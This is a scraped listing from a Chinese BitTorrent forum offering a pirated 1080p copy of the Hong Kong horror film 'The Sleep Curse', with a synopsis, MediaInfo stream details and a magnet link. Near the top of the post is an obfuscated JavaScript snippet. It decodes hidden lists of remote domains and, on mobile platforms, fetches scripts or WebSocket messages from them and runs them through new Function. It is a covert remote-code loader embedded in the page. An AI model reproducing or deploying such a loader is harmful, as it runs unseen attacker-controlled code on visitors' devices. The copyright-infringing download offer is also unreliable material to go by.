失眠[国粤语音轨/中文字幕]The.Sleep.Curse.2017.1080p.x264.DTS.2Audio-迅雷下载 10.22GB

版主小s 19天前 247

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 失眠 / The Sleep Curse

◎年 代 2017

◎产 地 中国香港

◎类 别 恐怖

◎语 言 粤语

◎上映日期 2017-04-17(中国香港电影节) / 2017-05-18(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt6754750/

◎豆瓣评分 6.2/10 (13387人评价)

◎豆瓣链接 /subject/26748223/

◎片 长 102分钟

◎导 演 name null (id:)

◎编 剧 name null (id:)

◎演 员 name null (id:)

name null (id:)

name null (id:)

◎标 签 恐怖 / 香港 / 血腥 / 惊悚 / 灵异 / 暴力 / 2017 / 犯罪

◎简 介

著名大學醫學院教授林惜家(黃秋生飾),專門研究人類可以長時間不需睡眠的方法。一天,前女友丘夢熙(吳俐璇飾)突然現身求助,原來她的家人全部患上失眠症,病情去到末期,病人更會陷入失常狀態、極具攻擊性!為探究真相,林惜家開始連串恐怖實驗:潛入停屍間偷取病人大腦,又把丘夢熙關在密室軟禁,藉此研究睡眠和大腦蛋白質之間的關係…

隨著實驗愈深入,蹊蹺的事情不斷在丘夢熙身上發生;就連林惜家也看似受感染,心底開始出現吃人肉的慾望… 原來一切牽涉到45年前,孿生姐妹侯文媛和侯文禎(衛詩雅分飾)的一宗倫常慘案有關!

  1. General

  2. Unique ID : 274516282726631098192385760156077806014 (0xCE85E9B4A25AD790B298A9127AC451BE)

  3. Complete name : The.Sleep.Curse.2017.1080p.x264.DTS.2A[email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.2 GiB

  7. Duration : 1 h 40 min

  8. Overall bit rate : 14.6 Mb/s

  9. Movie name : The Sleep Curse - Blu-ray?

  10. Encoded date : UTC 2021-07-12 12:20:54

  11. Writing application : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 40 min

  25. Bit rate : 12.3 Mb/s

  26. Width : 1 920 pixels

  27. Height : 816 pixels

  28. Display aspect ratio : 2.35:1

  29. Frame rate mode : Constant

  30. Frame rate : 24.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.327

  36. Stream size : 8.60 GiB (84%)

  37. Writing library : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=22.5000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Default : Yes

  40. Forced : No


  41. Audio #1

  42. ID : 2

  43. ID in the original source medium : 4352 (0x1100)

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 1 h 40 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 509 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 16 bits

  55. Compression mode : Lossy

  56. Stream size : 1.06 GiB (10%)

  57. Title : Cantonese

  58. Language : Chinese

  59. Default : Yes

  60. Forced : No

  61. Original source medium : Blu-ray


  62. Audio #2

  63. ID : 3

  64. ID in the original source medium : 4353 (0x1101)

  65. Format : E-AC-3

  66. Format/Info : Enhanced AC-3

  67. Commercial name : Dolby Digital Plus

  68. Format profile : Blu-ray Disc

  69. Codec ID : A_EAC3

  70. Duration : 1 h 40 min

  71. Bit rate mode : Constant

  72. Bit rate : 768 kb/s

  73. Channel(s) : 8 channels

  74. Channel layout : L R C LFE Ls Rs Lb Rb

  75. Sampling rate : 48.0 kHz

  76. Frame rate : 31.250 FPS (1536 SPF)

  77. Compression mode : Lossy

  78. Stream size : 550 MiB (5%)

  79. Title : Mandarin

  80. Language : Chinese

  81. Service kind : Complete Main

  82. Default : No

  83. Forced : No

  84. Original source medium : Blu-ray


  85. Text #1

  86. ID : 4

  87. ID in the original source medium : 4609 (0x1201)

  88. Format : PGS

  89. Muxing mode : zlib

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 37 min

  93. Bit rate : 22.6 kb/s

  94. Count of elements : 1747

  95. Stream size : 15.7 MiB (0%)

  96. Title : chs

  97. Language : Chinese

  98. Default : Yes

  99. Forced : No

  100. Original source medium : Blu-ray


  101. Text #2

  102. ID : 5

  103. ID in the original source medium : 4608 (0x1200)

  104. Format : PGS

  105. Muxing mode : zlib

  106. Codec ID : S_HDMV/PGS

  107. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  108. Duration : 1 h 37 min

  109. Bit rate : 22.5 kb/s

  110. Count of elements : 1747

  111. Stream size : 15.6 MiB (0%)

  112. Title : cht

  113. Language : Chinese

  114. Default : No

  115. Forced : No

  116. Original source medium : Blu-ray


  117. Text #3

  118. ID : 6

  119. ID in the original source medium : 4610 (0x1202)

  120. Format : PGS

  121. Muxing mode : zlib

  122. Codec ID : S_HDMV/PGS

  123. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  124. Duration : 1 h 37 min

  125. Bit rate : 25.4 kb/s

  126. Count of elements : 1747

  127. Stream size : 17.7 MiB (0%)

  128. Title : eng

  129. Language : English

  130. Default : No

  131. Forced : No

  132. Original source medium : Blu-ray


  133. Menu

  134. 00:00:00.000 : Chapter 01

  135. 00:07:37.833 : Chapter 02

  136. 00:17:44.083 : Chapter 03

  137. 00:27:16.000 : Chapter 04

  138. 00:33:39.791 : Chapter 05

  139. 00:40:54.166 : Chapter 06

  140. 00:49:27.416 : Chapter 07

  141. 00:58:27.666 : Chapter 08

  142. 01:08:22.583 : Chapter 09

  143. 01:17:00.833 : Chapter 10

  144. 01:25:21.083 : Chapter 11

  145. 01:38:01.125 : Chapter 12


TAGS 恐怖

磁力链:
  • magnet:?xt=urn:btih:5CFBD98E8F50AD7977E4F2800E171C0DFFC1D0BF
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回